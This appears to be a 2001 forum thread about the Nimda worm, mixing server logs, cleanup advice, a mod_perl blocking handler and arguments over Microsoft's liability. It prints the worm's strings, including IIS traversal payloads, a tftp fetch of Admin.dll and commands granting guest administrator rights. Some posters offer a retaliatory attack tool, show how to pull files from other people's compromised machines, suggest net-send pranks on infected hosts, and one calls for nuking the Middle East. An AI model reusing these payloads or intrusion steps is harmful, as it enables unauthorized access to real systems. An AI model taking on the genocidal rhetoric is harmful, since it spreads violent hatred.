It's sitting causing havoc right now. Quite interesting seeing what some of those dodgy requests throw back at you, all sort of corporate espionage potential, and it's all automated; you already know the machines you're attacking are vulnerable cos they're attacking you!
Runs great in Win32, should be fine on Linux too but I ain't tested it.
Anybody else feeling nihilistic who wants it, give me yr email or icq and I'll be happy to oblige.
For extra credit points, re-implement it yourself in Rebol.
Attack as of: 2:48:36 PM on 9/18/2001 (Indiana):
/var/log;cat access_log|grep cmd.exe|grep 18/Sep|sort -n +1 > /tmp/attack.txt
/tmp/attack.txt in ASCII mode to your c:\
Number of attacks in 000 hours: 0
Number of attacks in 100 hours: 0
Number of attacks in 200 hours: 0
Number of attacks in 300 hours: 0
Number of attacks in 400 hours: 0
Number of attacks in 500 hours: 0
Number of attacks in 600 hours: 0
Number of attacks in 700 hours: 0
Number of attacks in 800 hours: 416
Number of attacks in 900 hours: 1096
Number of attacks in 1000 hours: 1121
Number of attacks in 1100 hours: 1373
Number of attacks in 1200 hours: 1821
Number of attacks in 1300 hours: 1450
Number of attacks in 1400 hours: 1125
Number of attacks in 1500 hours: 0
Number of attacks in 1600 hours: 0
Number of attacks in 1700 hours: 0
Number of attacks in 1800 hours: 0
Number of attacks in 1900 hours: 0
Number of attacks in 2000 hours: 0
Number of attacks in 2100 hours: 0
Number of attacks in 2200 hours: 0
Number of attacks in 2300 hours: 0
Total Number of Attacks = 8402
How to get there:
Step 1: Grab your Access log off your still functional Apache Web Server:
cd
Step 2: Ftp
Step 3: Execute this VB code (re-write it in perl if it bugs ya).
Option Explicit
Sub Main()
Dim ScanLine, CurrentIP, LastIP As String
Dim AttackHour(0 To 23) As Integer
Dim AttackTime As Integer
Dim TotalAttacks As Integer
Dim X As Integer
Open "C:\attack.txt" For Input As #1
Open "C:\results.txt" For Output As #2
Print #2, "Attacking IP's as of: " & Time & " on " & Date
CurrentIP = ""
LastIP = ""
TotalAttacks = 0
While Not EOF(1)
Line Input #1, ScanLine
CurrentIP = Trim(Left(ScanLine, InStr(ScanLine, "-") - 1))
AttackTime = Val(Trim(Mid(ScanLine, InStr(ScanLine, ":") + 1, 2)))
AttackHour(AttackTime) = AttackHour(AttackTime) + 1
If CurrentIP LastIP Then
Print #2, LastIP
LastIP = CurrentIP
End If
Wend
Close #1
Print #2, vbNewLine
For X = 0 To 23
Print #2, "Number of attacks in " & Trim(Str(X)) & "00 hours: " & AttackHour(X)
TotalAttacks = TotalAttacks + AttackHour(X)
Next X
Print #2, "Total Number of Attacks = " & Str(TotalAttacks)
Close #2
End Sub
Step 4: You can do what you wish with the Information, I e-mailed mine to CERT for tracking as requested on their site.
Sorry, but I use IIS a lot. I'm an ASP developer, and we have tons of IIS boxes.
Were we hit by Code Red? Nope. Code Red II? Nope. This? Nope. ANY worm? Not a chance.
All these worms exploit SERIOUSLY OLD holes in IIS, of which patches have been release over 3-5 MONTHS ago. All of these pacthes are available via Windows Update, and show up with a "Critical Updates Notification" on the taskbar.
Anyone who runs ANY server but is 5 months behind on security updates is an absolute MORON, and deserves to be hit with a worm. It's easy to blame MS for all their "security holes", but folks...these have been patched for a while now...
-Jayde
What's a sig?
[Tue Sep 18 22:48:51 2001] [error] [client 212.152.179.213] File does not exist: /var/www/html/ftlight.net/www/undercon/msadc/..%5c ../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/ cmd.exe
/var/www/html/ftlight.net/www/undercon/scripts/..Á ../winnt/system32/cmd.exe
/var/www/html/ftlight.net/www/undercon/scripts/..À ../winnt/system32/cmd.exe
/var/www/html/ftlight.net/www/undercon/scripts/..Á ../winnt/system32/cmd.exe
/var/www/html/ftlight.net/www/undercon/scripts/..% 5c../winnt/system32/cmd.exe
/var/www/html/ftlight.net/www/undercon/scripts/..% 2f../winnt/system32/cmd.exe
[Tue Sep 18 22:48:51 2001] [error] [client 212.152.179.213] File does not exist:
[Tue Sep 18 22:48:52 2001] [error] [client 212.152.179.213] File does not exist:
[Tue Sep 18 22:48:52 2001] [error] [client 212.152.179.213] File does not exist:
[Tue Sep 18 22:48:52 2001] [error] [client 212.152.179.213] File does not exist:
[Tue Sep 18 22:48:52 2001] [error] [client 212.152.179.213] File does not exist:
My Apache log should not look like that!!!!
I've been hit 1500 times in less than 6 hours! This is what terrorist attacks look like when their target is the web.
All hail M$ for their pice of bandwidth generating ****.
Sorry, but I use Fords a lot. I'm a commercial driver, and we have tons of Fords.
have we had a high speed blowout? Not a chance.
This problem is SERIOUSLY OLD holes in tyres, for which patches have been release over 3-5 MONTHS ago. All of these patches are available via your local dealer.
Anyone who runs ANY Ford but is 5 months behind on tyre updates is an absolute MORON, and deserves to crash. It's easy to blame Firestone for all their "security holes", but folks...these have been patched for a while now...
My first hit with this worm appears at 09:40:21 -0500 from the IP 65.3.211.164. If we get enough people to see when the first hit occured, we might be able to get an idea of where it originated.
From a Unix machine I checked my logs for probes from hosed machines. Then
prompt> tftp ip.address.of.machine
tftp> bin
tftp> get autoexec.bat
file recieved someKb in blah:time
tftp>quit
if you edit the autoexec.bat file you just nabbed, you'll see it's not a batch file at all but some sort of binary. Weird stuff, just thought I'd share. Also this only works on about 75% of the compromised machines for some reason, the rest just time out on transfer. Thoughts?
I don't necessarily disagree with a lot of what you're saying, but you're going over the edge with these...
In the case of IIS, Microsoft claimed that it was secure.
Show me a quote where Microsoft claims that their software is perfect. No software is perfectly secure (e.g., wuFTP, my personal favorite that caused my system to be cracked). Show me perfect software, and I will show you a Hello World program. And don't try and tell me that OSS is perfect, I know better.
In the case of their e-mail client (Outlook/Outlook Express), who in their right mind would write an e-mail client that executed code (vbscript, etc.) enclosed in an e-mail?
I would. Just because a lot of people want to live in a world of green screens and monofonts doesn't mean everyone wants to live in the past. I like being able to open a document that someone e-mails me without having to save it off somewhere.
Not to say that these things shouldn't have better security, but there is absolutely no question that mail readers should allow attachments to be executed. Personally, I would like to see a "sandbox" concept applied to opening e-mail attachments.
Sometimes it's best to just let stupid people be stupid.
Not sure if this has been posted yet, but here's the strings of the file.. i only removed the characters that had nothing to do with it:
e rs \Interfaces\
e rs \Interfaces
r er \Shell Folders
S ha res\Security
/add
/add
/active
/add
r er \Advanced
. %c 1%1c../..%c1%1c..
.exe
. %c 1%1c../..%c1%1c..
.exe
r k\ LanMan\X$
r k\ LanMan\
r k\ LanMan
S ha res
r er \MapMail
!This program cannot be run in DOS mode.
O
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID:
--====_ABC1234567890DEF_====
NUL=
[rename]
\wininit.ini
Personal
LoadLibraryA
GetSystemTime
ExitProcess
HeapDestroy
GetLastError
HeapCreate
WritePrivateProfileStringA
KERNEL32.dll
RegCloseKey
RegQueryValueExA
RegOpenKeyExA
RegEnumKeyExA
RegCreateKeyExA
RegDeleteKeyA
RegEnumValueA
RegSetValueExA
RegQueryValueA
ADVAPI32.dll
System\CurrentControlSet\Services\VxD\MSTCP
NameServer
SYSTEM\CurrentControlSet\Services\Tcpip\Paramet
SYSTEM\CurrentControlSet\Services\Tcpip\Paramet
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="
--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
--====_ABC0987654321DEF_====--
--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID:
--====_ABC1234567890DEF_====
NUL=
[rename]
\wininit.ini
Personal
Software\Microsoft\Windows\CurrentVersion\Explo
\*.*
EXPLORER
fsdhqherwqi2001
SYSTEM\CurrentControlSet\Services\lanmanserver\
share c$=c:\
user guest ""
localgroup Administrators guest
localgroup Guests guest
user guest
open
user guest
HideFileExt
ShowSuperHidden
Hidden
Software\Microsoft\Windows\CurrentVersion\Explo
\\%s
%ld %ld %ld
%ld %ld
Image Space Exec Write Copy
Image Space Exec Read/Write
Image Space Exec Read Only
Image Space Executable
Image Space Write Copy
Image Space Read/Write
Image Space Read Only
Image Space No Access
Mapped Space Exec Write Copy
Mapped Space Exec Read/Write
Mapped Space Exec Read Only
Mapped Space Executable
Mapped Space Write Copy
Mapped Space Read/Write
Mapped Space Read Only
Mapped Space No Access
Reserved Space Exec Write Copy
Reserved Space Exec Read/Write
Reserved Space Exec Read Only
Reserved Space Executable
Reserved Space Write Copy
Reserved Space Read/Write
Reserved Space Read Only
Reserved Space No Access
Process Address Space
Exec Write Copy
Exec Read/Write
Exec Read Only
Executable
Write Copy
Read/Write
Read Only
No Access
Image
User PC
Thread Details
ID Thread
Priority Current
Context Switches/sec
Start Address
Thread
Page Faults/sec
Virtual Bytes Peak
Virtual Bytes
Private Bytes
ID Process
Elapsed Time
Priority Base
Working Set Peak
Working Set
% User Time
% Privileged Time
% Processor Time
Process
Counter 009
software\microsoft\windows nt\currentversion\perflib\009
Counters
Version
Last Counter
software\microsoft\windows nt\currentversion\perflib
/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../.
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..
/root.exe?/c+
/winnt/system32/cmd.exe?/c+
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
Admin.dll
c:\Admin.dll
d:\Admin.dll
e:\Admin.dll
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
/Admin.dll
GET %s HTTP/1.0
Host: www
Connnection: close
readme
main
index
default
html
.asp
.htm
\readme.eml
.exe
winzip32.exe
riched20.dll
.nws
.eml
.doc
% Privileged Time
% Processor Time
Process
Counter 009
software\microsoft\windows nt\currentversion\perflib\009
Counters
Version
Last Counter
software\microsoft\windows nt\currentversion\perflib
/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../.
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..
/root.exe?/c+
/winnt/system32/cmd.exe?/c+
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
Admin.dll
c:\Admin.dll
d:\Admin.dll
e:\Admin.dll
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
/Admin.dll
GET %s HTTP/1.0
Host: www
Connnection: close
readme
main
index
default
html
.asp
.htm
\readme.eml
.exe
winzip32.exe
riched20.dll
.nws
.eml
.doc
dontrunold
ioctlsocket
gethostbyname
gethostname
inet_ntoa
inet_addr
ntohl
htonl
ntohs
htons
closesocket
select
sendto
send
recvfrom
recv
bind
connect
socket
__WSAFDIsSet
WSACleanup
WSAStartup
ws2_32.dll
MAPILogoff
MAPISendMail
MAPIFreeBuffer
MAPIReadMail
MAPIFindNext
MAPIResolveName
MAPILogon
MAPI32.DLL
WNetAddConnection2A
WNetCancelConnection2A
WNetOpenEnumA
WNetEnumResourceA
WNetCloseEnum
MPR.DLL
ShellExecuteA
SHELL32.DLL
RegisterServiceProcess
VirtualFreeEx
VirtualQueryEx
VirtualAllocEx
VirtualProtectEx
CreateRemoteThread
HeapCompact
HeapFree
HeapAlloc
HeapDestroy
HeapCreate
KERNEL32.DLL
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
Type
Remark
SOFTWARE\Microsoft\Windows\CurrentVersion\Netwo
Parm2enc
Parm1enc
Flags
Path
SOFTWARE\Microsoft\Windows\CurrentVersion\Netwo
SOFTWARE\Microsoft\Windows\CurrentVersion\Netwo
SYSTEM\CurrentControlSet\Services\lanmanserver\
Cache
Software\Microsoft\Windows\CurrentVersion\Explo
QUIT
Subject:
From:
DATA
RCPT TO:
MAIL FROM:
HELO
aabbcc
-dontrunold
NULL
\readme*.exe
admin.dll
qusery9bnow
-qusery9bnow
\mmc.exe
\riched20.dll
boot
Shell
explorer.exe load.exe -dontrunold
\system.ini
\load.exe
octet
Microsoft incompetence may finally be becoming a threat to national security
Anyone have any clues on whether the personal webserver used by Frontpage and such has the folder traversal exploit. We are trying to root out any workstation problem software as well as be sure servers are patched and protected.
I tried it the other day on my laptop with IIS 5.0. Well, not only left my IIS tight up and secure, it left it so secure that it wouldn't even serve pages.
Link here.
Yeah, but does the poor sod he hits when he blows off the road deserve to crash as well?
This is the point. Are you still missing it?
My sysem has been locking up as it has run out of resources. (apachee on Red Hat Linux).
I started to work around this with a script to restart my apache server every 5 minutes, but now it seems that if I just lower my timeouts to nothing (1 second) and turn off keepalives it has enough resources to cope.
-GReg
While looking for the best IE5 "Security Settings" to recommend to our Windows users, I ran across this wonderful nugget of Microsoft wisdom:
"Scripts are usually safe. Do you want to allow scripts to run?"
To reproduce:
Set Tools | Internet Options | Security | Custom Level | Scripting | Active Scripting = Prompt
Go to an infected server (like http://dkb3.dkbnet.com)
Notice that it gives no other clues about what is going on. Nothing.
------DO NOT WRITE BELOW THIS LINE------
This is really annoying, if you look in your inetpub directory you see files like tftp0101 and so on and they keep getting added. Also when I first noticed the problem the default.htm file had a javaapp in there to automatically display a download box to download README.EXE another virus that my Mcafee didn't pick up and I even had the latest superdat.....
There worm-viruses seem to exploit IIS which exists on NT and 2000 servers. Well, if you are on NT or 2000, you can go into your command prompt and type "net send YOU HAVE BEEN INFECTED WITH A VIRUS, PLEASE REMOVE IMMEDIATLY"
This message (HAVE BEEN INFECTED WITH A VIRUS, PLEASE REMOVE IMMEDIATLY) will pop-up on the computer who owns the incoming ip. This is great fun because the people on the other end probably think a hacker is in their computer or something.
This is all assuming you have a method of viewing incoming requests on port 80. I use a router which has a log so I just check that and send a few messages out to the ip's that seem to be requesting more than once.
This method is also good for impressing your girlfriend at your 1337 h4x0r 5k1ll5.
Nuke Afghanistan, Palestine, Iraq, Syria, Iran, Lebanon, Sudan, Algeria, UAE, Saudi Arabia, Turkmenistan, Pakistan, um... fuck it the whole Middle East and NE Africa. Nuke it all. Burn those bitches alive.
And I guarantee these silly Virus/Worms will magically disappear.
.. for those of us who have never used IE?
- jon
Ganymede, a GPL'ed metadirectory for UNIX
I'm sure someone has posted this, and it's not complete, but it'll make your day easier.
I've figured this worm out. You see, today, hosting machines running Windows NT 4 or Windows 2000 are getting FUCKED UP by a worm called nimda. I've isolated how to remove this -- it appears to be working fine. So, if you're a Windows user running IIS, double check for this shit!
Do a find for *.eml, and remove all of them.
Do a find for Admin.dll (should be in the root folder of all of your drives -- C:, D:, etc.), and remove or rename them for safekeeping.
Edit %Systemroot%\System32\etc\services, and find the entry for "tftp". It's routed to port 69/udp. Route it to 0/udp. This will deactivate the service. Windows protects the tftp app, so you can't remove it. So, nullroute it!
Reboot your machine, make sure you're patched with the latest Critical Updates.
Laugh at the incoming requests.
I need to sleep. NT hacking whilst sick sucks my ass.
- oZ
// i am here.
Do we really have to argue this all over again? It will never happen. If you want to know why, go back and re-read the Code Red discussion on Slashdot.
Summary: Microsoft did not write the virus. Microsoft patched the flaw over a year ago. Microsoft has made every attempt to patch known flaws. Microsoft makes every effort to notify known administrators about problems as they arise.
The real cause of the problem is braindead users that don't patch their systems. Sue them, if you'd like.
"And like that
Our network is running several win2K servers, only one of which has gotten infected. That box was upgraded from NT4 to 2K, after which it had all the proper security patches applied. Yet, it still got infected. Anybody have a clue why? (and don't tell me we didn't put the patches in right.)
i dont know if this is helpful to anyone, but this is how i got rid of the worm(still am not 100% sure how to prevent infection).
.htm, .html, and .asp files which creates a popup on the client machine. This popup runs the readme.exe file and spreads the virus to clients. Since you deleted all of the .eml files it wont find anything but you still want to get rid of this empty popup. So, use ultraedit or homesite or any other text editor to do a massive search and replace to remove the following line:
1) first update win2000 to service pack 2 if you dont already have it. Download all critical fixes and security patches.
2) Then stop all IIS sites and physically unplug your network connection.
3) Run regedit and search for readme.eml and readme.exe. Delete all references to them. ALSO, in one of the registry groups you will find both of these keys next to eachother. They will also be next to admin.dll and root.exe. In this group only, delete the admin.dll and root.exe keys.
4) Run a file search from the start menu. Search for readme.eml on all drives and make sure to search subdirectories too. Don't click on any of the files that show up(for me if you even single click they will run). Instead do a Ctrl-A and then Shift-Ctrl-Del to delete all of them. Do the same for any readme.exe files you may find. Now search for root.exe and admin.dll. Both of these files are required windows files so don't automatically delete them. However, the worm will probably copy them to your IIS script directories which is bad. So if they show up in any IIS script or web directories(Inetpub/scripts for example) make sure to delete them.
5) Empty your recycle bin.
6) Reboot.
7) run steps 3-6 until you no longer find any traces of these files in the registry or on your machine.
8) Should be good now so you can reconnect your machine to the net and start up IIS sites.
after everything is cleaned out there will still be some traces you should get rid of. for one, it will put hacked splash pages in your default web server directories so delete any such pages(index.htm, index.html, default.asp, etc.). Also the worm adds a javascript line to the end of
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script> </html>
I'm seeing hits from strictly default.ida type attacks only as early as the 5th. And from the 5th to the 18th, I don't see many requests at all. (Maybe 15 or so) Which makes me think it's code red or some other variant.
I begin to see the more common cmd.exe root.exe requests only today, started at 9:30. Perhaps if we can trace the exact time of the hits, we can localize the source, though that seems somewhat farfetched.
MS software isn't the only software with holes. Linux has a few itself, as well as every other OS.
now more than ever the internet is a valuable needed resource. It needs hardening up for the upcoming possible terrorist attacks to the most easily accessed piece of our infrastructure.
I can see that running all MS servers and browsers can render it all trash eaily with perhaps the right virus/worm.
The need is for diversity and perhaps blacklisting many middle eastern ips or portals. Can't someone blackhole Peshwar and that cybercafe?
My website log shows the following "GET"
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
203.109.250.95 - - [26/Aug/2001:03:53:04 -0400] "GET
may just be a coincidence.
John
Do we really have to argue this all over again?
No. You could simply admit that I am right or choose not to participate. Either one is fine by me.
Summary: Microsoft did not write the virus.
So what? They are still liable for product flaws. Suppose that your bank had a flaw on their web page that let anyone find your credit card number. Would you say that they were not to blame if someone exploited that flaw and used your credit card?
Microsoft patched the flaw over a year ago.
Not true. Microsoft made a patch available to those that knew about it. "Patched" would mean that they actively installed the patch.
Microsoft has made every attempt to patch known flaws.
Not true. There are many flaws in their "Knowledge Base" that have never been patched -- some of which are related to security.
Microsoft makes every effort to notify known administrators about problems as they arise.
Absolutely not true. The way you make the public aware of a product defect is to send registered owners mail (with a stamp -- not e-mail). Microsoft has not done this. Instead, they put notices up on their web pages and relied on users checking for patches regularly -- even though they know that most never do.
If Microsoft can send you snail mail telling you that they want to sell you a new version of Visual C++, they can send you a CD-ROM with patches for severe security flaws in the OS that they sold to you.
Careful what you wish for. Do you really want to establish a precedence that sez all software developers are libel for the worms others create? I'm guessing you don't write much code.
:w
if you go to the Symantec Link for info in the "W32.Nimda" worm, go check out the Symantec home page and the Windows XP compatability section. I am noticing an alarming trend forming here. There is a new logo for WinXP compatability for companies to stick on their boxes. Buts wait, read the rest under the "coveted compatability logo"... This product is compatable with: WinXP Home/WinXP Pro/2000PRO/NT4 WS/ME/98/95 I can't wait till the windows 2010 release, when you go buy a Dell, the whole front panel will be a friggin huge WINDOWS XBlahX logo. There won't be any room left for the people that actually make the product you bought on their boxes, books, computers...etc., to state what the product is. It will take all that space to show which window(s) it is compatable with. I just need to sit down and learn linux.
I'm seeing it from 204.x.x.x, 209.x.x.x, and 66.x.x.x at the moment - that's from the logs of a server that's got a 204.- IP.
I'm not at home and don't remember my p/w, sorry.
I guess this is why I don't use outlook to check my email: I just got an email from "beta@winzip.com" with the nimda readme.exe file attached. Joy. And I was just starting to forget why I should have a personal email account and a spam account.
This comment was not generated by Uber Elephants...
To minimise the amount of work Apache has to do when hit by an infected host, if you run mod_perl add these lines to your httpd.conf: :response);
/root\.exe|cmd\.exe|default\.ida/i) {
----
<Perl>
{
package Apache::Vermicide;
use Apache::Constants qw(:common
sub handler {
my $r = shift;
if ($r->uri() =~
$r->push_handlers(PerlLogHandler => sub { return BAD_REQUEST });
return BAD_REQUEST;
}
return OK;
}
}
</Perl>
PerlPostReadRequestHandler Apache::Vermicide
----
Thanks to Nathan Torkington for this code.
My server normally runs from 1-2 K hits per hour. With this new worm variant has it in the 5K+/hour range. And it's coming from all over the place.
So what? They are still liable for product flaws.
In your opinion...
Suppose that your bank had a flaw on their web page that let anyone find your credit card number. Would you say that they were not to blame if someone exploited that flaw and used your credit card?
Apples and Oranges. If you want to make it apples and apples, I would not blame my bank, but instead the software company that created their operating system, or the person or group of people that wrote their CGI scripts. After all, the bank just maintains the PC's, they don't write the software themselves, correct?
Not true. Microsoft made a patch available to those that knew about it. "Patched" would mean that they actively installed the patch.
Wrong. I did not say Microsoft patched ALL SERVERS. I said Microsoft patched THE FLAW. In other words, they wrote a patch that fixes the flaw. They posted this notice to their list (which anyone can subscribe to) that dispenses security notices. They posted this news on their website. And I'm sure they will increase notifications due to this latest threat.
You probably think the gun manufacturers should be sued because someone shoots someone with a gun, right?
Absolutely not true. The way you make the public aware of a product defect is to send registered owners mail (with a stamp -- not e-mail).
This would make ZERO DIFFERENCE. Why? Because the people that are the cause of this problem don't bother to register their software. How exactly could Microsoft reach these clueless morons?
If Microsoft can send you snail mail telling you that they want to sell you a new version of Visual C++, they can send you a CD-ROM with patches for severe security flaws in the OS that they sold to you.
First of all, I run many servers running IIS. I've probably only registered a handful of them. We buy the software not from Microsoft but from third parties. I very rarely receive mailed ads from Microsoft.
So you're of the opinion that the same people that receive ads from Microsoft are the same people running IIS on their machines and haven't patched it?
The problem here is joe-blow not keeping his machine secured.
"And like that
Like "Microsoft IIS Worm #400" or "Microsoft Outlook Virus #194"?
Maybe Microsoft will start patching up their crap if their name is associated with these things.
I run a stripped-down Apache on the gateway machine.
In my httpd.conf:
NameVirtualHost *
<VirtualHost *>
ServerAdmin loki@twwol.dyndns.org
ServerName dummy.twwol.dyndns.org
RewriteEngine on
RewriteRule ^(.*) http://www.twwol.dyndns.org$1 [R,L]
</VirtualHost>
This does two things.
The important thing that I like about it is that it forces any requests to *.twwol.dyndns.org that don't match any of my hosts to get forwarded to the main www address, because the dummy host is first. (DynDNS allows for a wildcard feature; lookup any *.twwol.dyndns.org and you get my gateway; connect to port 80 and you wake up Apache, which then determines which host you really wanted and forwards the request inwards to the LAN (via a ProxyPass directive).
The other nice thing that I like about it is that it totally blocks access from bots that don't know the right name of my machines (which, naturally, you can't get from gethostbyaddr, since my DSL provider gives me my Official hostname). This includes, for example, Code Red worms; they connect to my gateway, get a 302, and wander along. Since I don't have a global CustomLog directive (I provide CustomLog directives for each of the real hosts), there's no logs kept for the annoying little Code Red worms.
Which is good. I run a stripped-down Apache on the gateway partly for security, but also partly because its hard drive space is not spacious.
my old sig used to be funny, but then slashcode ate it and now it's not funny anymore
http://www.bookmarklets.com/
It's basically a bit of javascript contained in a url. You add it to bookmarks/favorites, and it then does something to the page you're looking at --- background color to white, or window resize for example.
Any web browser that supports javascript can potentially make use of the feature --- but you have to leave javascript turned on.
Windows users might wish to use the proxomitron at the same time (freeware.)
http://spywaresucks.org/prox/
Actually, I hear they're doing wonders with liquid nitrogen as well.
Hrmm.. i was rather disturbed today. I was looking around my linux box and found HUNDREDS of *.eml files. Now.. does anyone want to venture a guess as to how they got in there? Some of them I've seenbefore .. . (like the firs tpart of the file name).. others i haven't... my directory structure looks right... any idea how it got in?
~ Matt
My servers at AdAce have been getting hits from nimba since 6:23am PST today. Each infected machine hits me 16 times in 3 seconds, then I don't hear from it again for about 10 minutes.
At this point, there are 5723 unique IP addresses trying to probe my servers. I see a new IP address about every 45 seconds.
And, of course, there is no microsoft software of any kind that's accessible on those networks. All boxes running any microsoft software are isolated on a ghetto network, with very tight firewall rules.
You'd think that the bozos who write these things would at least check to see if the server was IIS before trying their probes. At least then my automatic log cycler wouldn't trigger so often.
-- Nolite audere delere orbiculum rigidum meum.
In the case of IIS, Microsoft claimed that it was secure.
a tion/features/web.asp)
.GIF URL. When his system sees a "GET" on his web server for the .GIF, he knows that your e-mail address is valid, the IP address of your machine, and that he's got a live one. Welcome to more spam. And you cannot turn off HTML fetching from your e-mail or have it ask you first.
Show me a quote where Microsoft claims that their software is perfect. No software is perfectly secure
I did not say that they claimed it was "perfect". I only said that they claimed it was secure (see the URL http://www.microsoft.com/windows2000/server/evalu
I like being able to open a document that someone e-mails me without having to save it off somewhere.
Now combine that "feature" with Microsoft's default of hiding file extensions and someone e-mails resume.doc.exe, the recipient sees resume.doc, and he double clicks on it. Outlook then executes the application without so much as an "are you sure?" prompt.
But what I was referring to was execution of script languages (e.g. VBScript) within e-mails.
Are you aware that a spammer can send you HTML e-mail and know when it is displayed on your screen? All he does is include a unique 1x1
These are all examples of gross security flaws that Microsoft has created. Sorry, but that's negligence in its simplist form.
of our server in germany, 213.x ip ;)
statistikexactly. alot of the problem here is with the users. they got what they paid for. from my discussions with a friend who works on alot of ms boxes, it seems that iis can be as secure as apache as long as you know what you are doing. people who say "*nix" doesnt have the sort of problems are living on borrowed time.
alot of the boxen that are being infected are doing so because they are running default installs with no patches. if you told me you were running a default redhat install i would laugh my ass off.
my main problems with windows is the security paradigm they use, and how the market ease of use. because of this a normal user can execute programs that infect system files. sort of like browsing the web as root. by marketing their product as "point and click"ish they attract the lowest common denominator in users.
it basically comes down to being an informed user. by the time you get to admining a unix box you are normally already a bit more informed, and you probably arent making the decision because it's _easy_ to use.
-- john
Scot's Turf Builder doesn't bundle the necessary agent to cause a problem (gasoline, IIRC).
Microsoft, however, does. In many ways (IE, Outlook, Outlook's buggy capability to execute stuff without asking, etc, etc...).
I think Scot's would be in big trouble if they bundled all the ingredients you need to turn an ordinary fertilizer into a bomb.
Somehow, Microsoft can bundle all sorts of useless crap that (due to the sheer amount of it) when you chip away at it, you have no trouble making something evil out of it.
Ho hum.
In the event that this one is attibuted to Bin Ladeneers, how could anyone deny that M$ "harbors" and facilitates his activities?
Let the Gov't wage its Secret War against the *Real* Public Enemy Number One: M$ Corp.
Crop rotation is done so that the soil is given a chance to recover. Different crops extract different nutrients from the soil, and leave different byproducts. If you constantly plant one variety of plant in a field, you will drain the soil of the nutrients that that plant needs to survive. Farmers switch between a number of different crops in such a way that Crop A supports Crop B, B supports C, and C supports A again.
Over 5,000 requests by the worm so far on this end.
This one should be a real bandwidth eater.
Do you like German cars?
>This would make ZERO DIFFERENCE. Why? Because the people that are the cause of this problem don't bother to register their software. How exactly could Microsoft reach these clueless morons?
If you're running warez you'd probably have a hard time convincing the judge that anything was Microsoft's fault. If you don't bother to register your software, again, Microsoft cannot be blamed if they make reasonable attempts to contact you.
Same thing as if you buy a Ford Explorer and move across the world. If you decide not to tell Ford, and something happens, can you blame them? I would think not. Most especially not when they decided to take out public ads on TV and in the newspapers about the problem.
>First of all, I run many servers running IIS. I've probably only registered a handful of them. We buy the software not from Microsoft but from third parties. I very rarely receive mailed ads from Microsoft.
They must have changed their policy then. I have only ever registered windows 3.0 (its true!), yet I ended up with ads for windows 3.1, 3.11, 95, and 98.
>The problem here is joe-blow not keeping his machine secured.
If Joe Blow chooses to make himself unknown to the corporation, and the corporation takes every measure to inform him personally about the problems, then maybe its Joe Blow's fault.
That and if Joe Blow chooses to use "professional" software to run a small website and it breaks, then maybe he should have gotten help on using it.
I don't have a drop forge steel mold in my backyard, and if I did I wouldn't sue the company because I don't know how to operate it. It's isn't meant for me in the first place!
If you want to make it apples and apples, I would not blame my bank, but instead the software company that created their operating system, or the person or group of people that wrote their CGI scripts. After all, the bank just maintains the PC's, they don't write the software themselves, correct?
Thank you. You just proved my point. You would blame the company that wrote the software, not the bank that "just maintains the PCs." Well, Microsoft wrote IIS and now you want to foist 100% of the blame on the user who 'just maintains the PC.'
Because the people that are the cause of this problem don't bother to register their software. How exactly could Microsoft reach these clueless morons?
Where do you get your information on what kinds of people do and do not register software? Would that fall under the category of "brown facts"?
Maybe the fact that Microsoft does not make a proactive effort to notify users, by mail -- including a patch disc, when there are problems explains why software registration is less than it could be.
I said Microsoft patched THE FLAW.
You can release a patch to correct a flaw or you can patch a program or system. You cannot patch a flaw. If I tell my client that I patched something, he assumes, correctly, that I installed a software change on one or more systems, not that I created the patch and left it for his staff to read about on the company web page. But, that's semantics and I seriously doubt that either of us will concede that point.
Does it have another check box that says "Always open attachments, especially those that could be a virus?" :)
Do you like German cars?
I did not say that they claimed it was "perfect" [...] see the URL http://www.microsoft.com/windows2000/server/evalua tion/features/web.asp
A claim of being "secure" implies a claim of "perfect security". I looked at the page, and I don't see the quote. They talk about "security features", but I don't see the claims you are talking about. Tell me the quote.
Now combine that "feature" with Microsoft's default of hiding file extensions and someone e-mails resume.doc.exe, the recipient sees resume.doc, and he double clicks on it.
Maybe that's not a feature for you, but it's certainly more user friendly to not see an extension. Does it create unintended consequences? Yes. But I don't this as a reasonable criticism, unless you also say all Macintosh names should have extensions as well.
Outlook then executes the application without so much as an "are you sure?" prompt.
Not true. Outlook gives you all sort of warning bells and whistles for a long time now.
All he does is include a unique 1x1 .GIF URL.
